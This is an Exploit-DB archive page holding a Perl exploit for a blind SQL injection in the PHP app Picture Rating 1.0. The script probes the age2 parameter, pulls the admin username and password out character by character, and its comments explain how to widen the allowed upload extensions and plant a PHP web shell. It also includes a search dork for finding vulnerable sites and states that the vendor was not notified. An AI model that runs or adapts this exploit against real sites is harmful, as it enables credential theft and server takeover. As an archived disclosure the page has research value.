Picture Rating 1.0 - Blind SQL Injection

EDB-ID:

5376

CVE:

N/A

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-04-05

Vulnerable App: 
#!/usr/bin/perl

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

# -Info/Instructions-
# After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/
# ok once you have logged in has admin you can upload a shell, click "edit settings" and under the allowed extensions, add ".php" ok now
# register as a normal user or backup the database and get a existing users and login to the main site and navigate to upload image/photo and choose your shell and click upload
# the shell should successfully upload and now you will see a broken image, right click the broken image icon and get the link, navigate to this link in your browser and thats your shell ;)


# Vendor Not Notified
# Discovered By: t0pP8uZz
# Discovered On: 6 April 2008
# greetz: milw0rm.com, h4ck-y0u.org, ciphercrew!

# inurl:"index.php?cmd=" Latest Pictures hot 

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

use strict;
use LWP::Simple;

print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n";
print "-  Discovered && Coded By: t0pP8uZz                                -\n";
print "-                                  Discovered On: 6 April 2008     -\n";
print "-                                                                  -\n";
print "-   This exploit will perform a automated BLIND SQL attack on ..   -\n";
print "-   .. the target host which is running the script.                -\n";
print "--------------------------------------------------------------------\n";

print "\nEnter URL (ie: http://site.com/): ";
	chomp(my $url=<STDIN>);
	
if(inject_test($url)) {
	print "Injecting.. Please Wait this could take several minutes..\n\n";
	my $details = blind($url);
	print "Exploit Success! Admin Details: ".$details;
	exit;
}

sub blind {

	my $url    = shift;
	my $res    = undef;
	my $chr    = 48;
	my $substr = 1;
	my $done   = 1;
	
	while($done) {
		my $content = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*");
		
		if($content =~ /Previous/ && $chr == 94) { $done = 0; }
			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url     = shift;
	my $true    = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=1");
	my $false   = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=2");
	
	if($true =~ /Previous/ && $false !~ /Previous/) {
		print "\nTarget Site Vulnerable!\n\n";
		return 1;
	} else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; }
}

# milw0rm.com [2008-04-05]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services